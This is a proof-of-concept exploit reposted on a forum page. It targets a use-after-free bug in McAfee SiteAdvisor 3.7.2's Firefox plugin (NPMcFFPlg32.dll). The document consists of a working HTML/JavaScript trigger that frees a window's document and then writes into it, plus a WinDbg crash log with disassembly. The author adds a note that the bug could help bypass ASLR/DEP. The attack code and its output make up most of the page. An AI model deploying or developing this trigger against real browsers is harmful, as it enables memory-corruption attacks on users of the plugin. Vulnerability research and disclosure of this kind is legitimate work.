|
|
- <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
- <html>
- <head>
- <meta http-equiv="content-type" content="text/html; charset=windows-1250">
- <meta name="generator" content="PSPad editor, [url]www.pspad.com[/url]">
- <title>McAfee SiteAdvisor 3.7.2 for firefox Use After Free Poc</title>
- </head>
- <body>
- <script>
-
- /*
- Title: McAfee SiteAdvisor 3.7.2 (firefox) Use After Free
- Author: Marcin Ressel
- Twitter: [url]https://twitter.com/m_ressel[/url]
- NPMcFFPlg32.dll
- McAfee SiteAdvisor 3.7.2
- Tested on: Windows 8.1 (x64) and firefox 38.0.5
- Homepage: [url]https://www.siteadvisor.com/[/url]
-
- Note: this vlun potentiali give us posibility to bruteforce base modules in memory
- to bypass ASLR/DEP because the bug doesn't have negative impact to webbrowser proces
- i mean firefox will not crash after trigger uaf i McAfee
-
- 0:107> !gflag
- Current NtGlobalFlag contents: 0x02001800
- htg - Enable heap tagging
- ust - Create user mode stack trace database
- hpa - Place heap allocations at ends of pages
-
- 0:107> g
- (1d68.1b54): Access violation - code c0000005 (first chance)
- First chance exceptions are reported before any exception handling.
- This exception may be expected and handled.
- eax=24b9efec ebx=00000000 ecx=00000000 edx=003bf030 esi=1a978ff0 edi=00000001
- eip=6f404391 esp=003bf014 ebp=003bf054 iopl=0 nv up ei pl zr na pe nc
- cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210246
- NPMcFFPlg32!CreateFFScriptable+0x141:
- 6f404391 8b4008 mov eax,dword ptr [eax+8] ds:002b:24b9eff4=????????
-
- ...
- 6f40437a 8b02 mov eax,dword ptr [edx]
- 6f40437c 85c0 test eax,eax
- 6f40437e 7402 je NPMcFFPlg32!CreateFFScriptable+0x132 (6f404382)
- 6f404380 8b00 mov eax,dword ptr [eax]
- 6f404382 8b4808 mov ecx,dword ptr [eax+8]
- 6f404385 8b4004 mov eax,dword ptr [eax+4]
- 6f404388 49 dec ecx
- 6f404389 234a08 and ecx,dword ptr [edx+8]
- 6f40438c 8b0488 mov eax,dword ptr [eax+ecx*4]
- 6f40438f 8b00 mov eax,dword ptr [eax]
- 6f404391 8b4008 mov eax,dword ptr [eax+8] ds:002b:24b9eff4=????????
- 6f404394 eb45 jmp NPMcFFPlg32!CreateFFScriptable+0x18b (6f4043db)
- 6f404396 8d45d0 lea eax,[ebp-30h]
- 6f404399 50 push eax
- 6f40439a e8d10e0000 call NPMcFFPlg32!CreateFFScriptable+0x1020 (6f405270)
- 6f40439f 8bd0 mov edx,eax
- 6f4043a1 8b02 mov eax,dword ptr [edx]
- 6f4043a3 85c0 test eax,eax
- 6f4043a5 7402 je NPMcFFPlg32!CreateFFScriptable+0x159 (6f4043a9)
- 6f4043a7 8b00 mov eax,dword ptr [eax]
- 6f4043a9 8b4808 mov ecx,dword ptr [eax+8]
- 6f4043ac 8b4004 mov eax,dword ptr [eax+4]
- 6f4043af 49 dec ecx
- 6f4043b0 234a08 and ecx,dword ptr [edx+8]
- 6f4043b3 8b3488 mov esi,dword ptr [eax+ecx*4]
- 6f4043b6 8d45c4 lea eax,[ebp-3Ch]
- 6f4043b9 50 push eax
- 6f4043ba e8b10e0000 call NPMcFFPlg32!CreateFFScriptable+0x1020 (6f405270)
- 6f4043bf 8bd0 mov edx,eax
- ...
-
- */
-
- var win = null;
-
- function crash()
- {
- var doc = win.document;
-
- var obj = doc;
- win.close();
-
- for(var p in obj)
- {
- if(typeof obj[p] == 'string')
- {
- try{ obj[p] = "CCCC"; }catch(err){}
- }
- }
- }
-
- win = window.open('data:text/html,','','width=20,height=20'); //you need disable popupBlocker
- win.onload = crash;
-
-
-
- </script>
-
- </body>
- </html>
|
|
|小黑屋|手机版|中国白客联盟-BUC
( 赣ICP备15007148号-6 ) 
窥视卡
雷达卡
发表于 2015-7-8 12:10:54
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
显身卡